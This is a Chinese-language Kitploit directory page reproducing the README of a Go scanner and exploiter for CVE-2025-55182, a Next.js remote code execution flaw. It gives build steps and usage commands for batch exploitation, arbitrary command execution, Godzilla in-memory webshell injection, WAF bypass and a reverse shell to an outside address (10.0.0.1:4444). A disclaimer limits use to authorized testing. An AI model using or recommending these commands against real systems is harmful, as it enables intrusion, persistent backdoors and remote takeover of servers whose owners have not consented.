Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-POC — 基于Go的CVE-2025-55182 (Next.js RCE) 扫描与利用工具。支持批量扫描、命令执行、Godzilla内存Shell注入、反向Shell和WAF绕过。 | Kitploit
工具/GitHubGitHub/luoqichen/cve-2025-55182-poc
漏洞扫描器漏洞利用ShellcodeWeb应用程序漏洞利用WAF绕过渗透测试命令与控制Payload 开发
GitHubluoqichen/cve-2025-55182-poc

CVE-2025-55182-POC

基于Go的CVE-2025-55182 (Next.js RCE) 扫描与利用工具。支持批量扫描、命令执行、Godzilla内存Shell注入、反向Shell和WAF绕过。

查看仓库
56个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 Next.js RCE Scanner

License

CVE-2025-55182 漏洞扫描与利用工具,针对 Next.js 应用程序的远程代码执行漏洞。支持批量检测、命令执行、哥斯拉内存马注入以及反弹 Shell 功能。

⚠️ 本工具仅供安全研究和授权测试使用,请勿用于非法用途。

特性

  • 多目标扫描:支持单个 URL、文件列表(每行一个 URL)以及包含多个 .txt 文件的文件夹。
  • 多线程并发:可自定义线程数,提升扫描效率。
  • 漏洞验证:通过计算随机数乘积的方式验证漏洞是否存在。
  • 命令执行:在漏洞目标上执行任意系统命令(支持 Linux 和 Windows)。
  • 哥斯拉内存马注入:一键生成哥斯拉内存马连接信息。
  • 反弹 Shell:支持反弹 Shell 功能。
  • 结果保存:自动保存成功利用的 URL 和详细信息到 success.json,并可选输出漏洞 URL 到指定文件。
  • 代理支持:可配置 HTTP 代理,便于联动 Burp Suite 等工具。
  • 进度显示:实时显示扫描进度、已用时间、预计剩余时间等。

[]

安装

前置要求

  • Go 1.16 或更高版本
  • Git

克隆仓库

root@kitploit:~
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC

编译

root@kitploit:~
go build -o cve-2025-55182 main.go

运行

root@kitploit:~
./cve-2025-55182 -h

使用方法

参数说明

参数类型默认值描述
-ustring无单个目标 URL(例如 http://example.com:3000)
-fstring无包含 URL 列表的文件(每行一个)
-dstring无包含多个 .txt 文件的文件夹
-ostring无输出文件(保存漏洞 URL,每行一个)
-tint10并发线程数
-toint10请求超时时间(秒)
-cstring无要执行的命令(例如 id)
-mstring无模式:waf(启用 WAF 绕过)
-pstring无HTTP 代理(例如 http://127.0.0.1:8080)
-gboolfalse启用哥斯拉内存马注入
-rsstring无反弹 Shell 地址(格式 IP:PORT)
-dvboolfalse详细模式(打印每个 URL 的扫描过程)
-esboolfalse敏感信息扫描模式

示例

扫描单个目标

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000

批量扫描文件中的目标

root@kitploit:~
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt

执行命令

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -c "whoami"

使用哥斯拉内存马

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -g

成功注入后,工具会输出哥斯拉的连接地址、密码、密钥和请求头信息。

反弹 Shell

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444

启用代理

root@kitploit:~
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10

输出说明

  • success.json:自动保存所有成功利用的目标详细信息(包括命令输出、哥斯拉配置等)。
  • -o 指定的文件:保存漏洞 URL 列表(每行一个)。

扫描过程中会实时显示进度条和已发现的漏洞,最终输出统计信息。

注意事项

  1. 确保已获得授权:未经授权扫描或攻击他人系统属于违法行为。
  2. 代理使用:如果需要通过 Burp Suite 查看流量,请使用 -p 参数设置代理。
  3. 哥斯拉连接:成功注入哥斯拉后,请使用哥斯拉客户端连接,注意密码和密钥均为随机生成。
  4. 超时设置:对于网络较差的目标,可适当增加 -to 参数值。

免责声明

本工具仅用于安全研究和授权测试,使用者需自行承担一切法律责任。开发者不对任何滥用行为负责。

License

MIT

下载工具